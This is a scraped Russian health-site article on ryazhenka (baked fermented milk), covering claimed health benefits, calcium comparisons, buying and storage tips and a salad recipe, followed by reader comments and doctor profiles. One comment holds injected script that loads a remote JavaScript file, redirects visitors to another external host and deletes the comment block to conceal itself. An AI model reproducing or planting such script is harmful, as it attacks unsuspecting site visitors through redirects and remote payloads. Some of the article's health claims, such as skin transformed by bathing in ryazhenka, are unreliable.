Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ряженка или йогурт. Польз...  >>  Ряженка или йогурт. Польза или вред
 
Обратная связь
 

Ряженка или йогурт. Польза или вред

Размер шрифта
23 ноября 2011 08:14
  • google_analytics: false
  • Нравится

Полезные бактерии и сила ваших костей. Как выбрать, как хранить и как правильно съесть ряженку.

Свое название этот кисломолочный напиток получил за то, что его делали в посуде ряже, или ряжке, небольшом кувшине. На Украине ряженку делают из смеси молока и сливок, томят ее при высокой температуре, не доводя до кипения, пока она не станет характерного кремового цвета.

Чем полезна ряженка?

  1. Богата кальцием и витамином D, которые способствуют укреплению костей.

  2. Железы начинают активнее выделять ферменты, в результате чего улучшается переваривание пищи.

  3. Молочная кислота улучшает работу почек, желудка и кишечного тракта. Она же усиливает аппетит.

  4. Белок в ряженке укрепляет мышечные ткани, в том числе сердечную мышцу.

  5. Кожа становится мягче. Если принять ванную с ряженкой, кожа преображается.

  6. Белок, который содержится в ряженке, усваивается быстрее, чем молочный.

К сожалению, по сравнению с другими кисломолочными продуктами ряженка очень калорийна. Поэтому, если очень хочется ряженки, но надо похудеть, можно купить варенец. Он не такой калорийный.

Пьедестал почета по содержанию кальция:

1. Йогурт –200 мг на 100 г
2. Кефир – 120 мг на 100 г
3. Ряженка – 118 мг на 100 г

Как выбрать

  • Ряженка должна быть кремового цвета с нежным кисломолочным запахом. Резкий запах говорит о том, что продукт испорчен.
  • Лучше всего покупать ряженку в стеклянной бутылке, чтобы видеть и цвет, и консистенцию продукта. 
  • В составе ряженки не должно быть стабилизаторов, ароматизаторов и красителей.
  • Консистенция ряженки должна быть однородной, без сгустков и пузырьков воздуха.
  • Сыворотка не должна отделяться слоями.
  • Выбирая ряженку, взболтайте бутылку: содержимое бутылки должно стекать по стенкам равномерно.

Как хранить

В закрытой упаковке срок хранения – не более 5 суток в холодильнике.

Как приготовить

Рецепт салата с кинзой и ряженкой

  • Промойте листья салата и высушите их бумажным полотенцем. Нарежьте тонкими полосками.

  • Кинзу промойте и так же промокните от лишней влаги. Удалите корешки и стебли, мелко нарежьте.

  • Смешайте в салатнице салат и кинзу, залейте прохладной ряженкой и еще раз перемешайте. Подавайте на стол. 


Видеосюжеты по теме: 
 

Ряженка. Кисломолочный продукт

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.